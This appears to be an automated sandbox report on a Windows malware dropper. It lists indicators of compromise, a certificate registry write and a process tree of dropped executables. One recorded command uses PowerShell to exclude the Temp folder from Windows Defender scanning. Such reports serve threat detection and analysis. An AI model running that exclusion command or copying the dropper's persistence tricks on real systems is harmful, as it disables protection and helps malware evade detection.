04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeFri00515c9ed9622f.exepid process 1212 powershell.exe 1212 powershell.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe 4512 Fri00515c9ed9622f.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3196 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
X5evWPL7qD3xAYZGheHG_oYH.exe1CC5.exepid process 724 X5evWPL7qD3xAYZGheHG_oYH.exe 6944 1CC5.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeFri00b338dc203.exeFri008331ebfd49.exePublicDwlBrowser1100.exe2.exeWerFault.exeBearVpn 3.exe4765798.scrFri008493e5f0216a2ff.exeGDhGY7j0oJbM3Xozvf7HGWwQ.exedescription pid process Token: SeDebugPrivilege 1212 powershell.exe Token: SeDebugPrivilege 4528 Fri00b338dc203.exe Token: SeDebugPrivilege 3872 Fri008331ebfd49.exe Token: SeDebugPrivilege 5616 PublicDwlBrowser1100.exe Token: SeDebugPrivilege 5696 2.exe Token: SeRestorePrivilege 5916 WerFault.exe Token: SeBackupPrivilege 5916 WerFault.exe Token: SeBackupPrivilege 5916 WerFault.exe Token: SeDebugPrivilege 5888 BearVpn 3.exe Token: SeDebugPrivilege 6116 4765798.scr Token: SeCreateTokenPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeAssignPrimaryTokenPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeLockMemoryPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeIncreaseQuotaPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeMachineAccountPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeTcbPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeSecurityPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeTakeOwnershipPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeLoadDriverPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeSystemProfilePrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeSystemtimePrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeProfSingleProcessPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeIncBasePriorityPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeCreatePagefilePrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeCreatePermanentPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeBackupPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeRestorePrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeShutdownPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeDebugPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeAuditPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeSystemEnvironmentPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeChangeNotifyPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeRemoteShutdownPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeUndockPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeSyncAgentPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeEnableDelegationPrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeManageVolumePrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeImpersonatePrivilege 4260 Fri008493e5f0216a2ff.exe Token: SeCreateGlobalPrivilege 4260 Fri008493e5f0216a2ff.exe Token: 31 4260 Fri008493e5f0216a2ff.exe Token: 32 4260 Fri008493e5f0216a2ff.exe Token: 33 4260 Fri008493e5f0216a2ff.exe Token: 34 4260 Fri008493e5f0216a2ff.exe Token: 35 4260 Fri008493e5f0216a2ff.exe Token: SeCreateTokenPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeAssignPrimaryTokenPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeLockMemoryPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeIncreaseQuotaPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeMachineAccountPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeTcbPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeSecurityPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeTakeOwnershipPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeLoadDriverPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeSystemProfilePrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeSystemtimePrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeProfSingleProcessPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeIncBasePriorityPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeCreatePagefilePrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeCreatePermanentPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeBackupPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeRestorePrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeShutdownPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeDebugPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe Token: SeAuditPrivilege 5736 GDhGY7j0oJbM3Xozvf7HGWwQ.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
ultramediaburner.tmpmsedge.exeIDownload.tmpinstaller.exeIDownload.App.exepid process 6692 ultramediaburner.tmp 1620 msedge.exe 7136 IDownload.tmp 5020 installer.exe 4276 IDownload.App.exe 4276 IDownload.App.exe 4276 IDownload.App.exe -
Suspicious use of SendNotifyMessage 3 IoCs
Processes:
IDownload.App.exepid process 4276 IDownload.App.exe 4276 IDownload.App.exe 4276 IDownload.App.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
cmd.execmd.exepid process 3948 cmd.exe 6420 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1168 wrote to memory of 3576 1168 setup_x86_x64_install.exe setup_installer.exe PID 1168 wrote to memory of 3576 1168 setup_x86_x64_install.exe setup_installer.exe PID 1168 wrote to memory of 3576 1168 setup_x86_x64_install.exe setup_installer.exe PID 3576 wrote to memory of 4724 3576 setup_installer.exe setup_install.exe PID 3576 wrote to memory of 4724 3576 setup_installer.exe setup_install.exe PID 3576 wrote to memory of 4724 3576 setup_installer.exe setup_install.exe PID 4724 wrote to memory of 4636 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4636 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4636 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4612 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4612 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4612 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4868 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4868 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4868 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4356 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4356 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4356 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4916 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4916 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4916 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 5056 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 5056 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 5056 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 3772 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 3772 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 3772 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 668 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 668 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 668 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 5052 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 5052 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 5052 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4460 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4460 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 4460 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 3232 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 3232 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 3232 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 876 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 876 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 876 4724 setup_install.exe cmd.exe PID 4356 wrote to memory of 1064 4356 cmd.exe Fri009c920a62076f.exe PID 4356 wrote to memory of 1064 4356 cmd.exe Fri009c920a62076f.exe PID 4356 wrote to memory of 1064 4356 cmd.exe Fri009c920a62076f.exe PID 4724 wrote to memory of 1248 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 1248 4724 setup_install.exe cmd.exe PID 4724 wrote to memory of 1248 4724 setup_install.exe cmd.exe PID 4636 wrote to memory of 1212 4636 cmd.exe powershell.exe PID 4636 wrote to memory of 1212 4636 cmd.exe powershell.exe PID 4636 wrote to memory of 1212 4636 cmd.exe powershell.exe PID 3772 wrote to memory of 1180 3772 cmd.exe Fri000fb585dc0ad7.exe PID 3772 wrote to memory of 1180 3772 cmd.exe Fri000fb585dc0ad7.exe PID 4612 wrote to memory of 5100 4612 cmd.exe Fri004dba7f4795.exe PID 4612 wrote to memory of 5100 4612 cmd.exe Fri004dba7f4795.exe PID 4612 wrote to memory of 5100 4612 cmd.exe Fri004dba7f4795.exe PID 5056 wrote to memory of 1652 5056 cmd.exe Fri007b1b030a1a32.exe PID 5056 wrote to memory of 1652 5056 cmd.exe Fri007b1b030a1a32.exe PID 5056 wrote to memory of 1652 5056 cmd.exe Fri007b1b030a1a32.exe PID 4916 wrote to memory of 4988 4916 cmd.exe Fri00ab2eee15cd1.exe PID 4916 wrote to memory of 4988 4916 cmd.exe Fri00ab2eee15cd1.exe PID 4916 wrote to memory of 4988 4916 cmd.exe Fri00ab2eee15cd1.exe PID 4868 wrote to memory of 3872 4868 cmd.exe Fri008331ebfd49.exe PID 4868 wrote to memory of 3872 4868 cmd.exe Fri008331ebfd49.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri004dba7f4795.exe /mixone4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri004dba7f4795.exeFri004dba7f4795.exe /mixone5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri008331ebfd49.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri008331ebfd49.exeFri008331ebfd49.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpD07F_tmp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri009c920a62076f.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri009c920a62076f.exeFri009c920a62076f.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri009c920a62076f.exeC:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri009c920a62076f.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri00ab2eee15cd1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ab2eee15cd1.exeFri00ab2eee15cd1.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-D0L12.tmp\Fri00ab2eee15cd1.tmp"C:\Users\Admin\AppData\Local\Temp\is-D0L12.tmp\Fri00ab2eee15cd1.tmp" /SL5="$2014A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS8FD45A90\Fri00ab2eee15cd1.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-DGFPF.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-DGFPF.tmp\___YHDG34.exe" /S /UID=burnerch27⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-THB2B.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-THB2B.tmp\ultramediaburner.tmp" /SL5="$302FE,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\VAONQHHNYJ\ultramediaburner.exe" /VERYSILENT9⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\b8-6b22a-f93-099bf-9843425aa2bac\Buvufaepywu.exe"C:\Users\Admin\AppData\Local\Temp\b8-6b22a-f93-099bf-9843425aa2bac\Buvufaepywu.exe"8⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e69⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ff85fcb46f8,0x7ff85fcb4708,0x7ff85fcb471810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2216 /prefetch:210⤵
- Executes dropped EXE
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2612 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:310⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3688 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:110⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:810⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,7236837350702951620,14202802338348434375,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5332 /prefetch:810⤵
- Executes dropped EXE
-
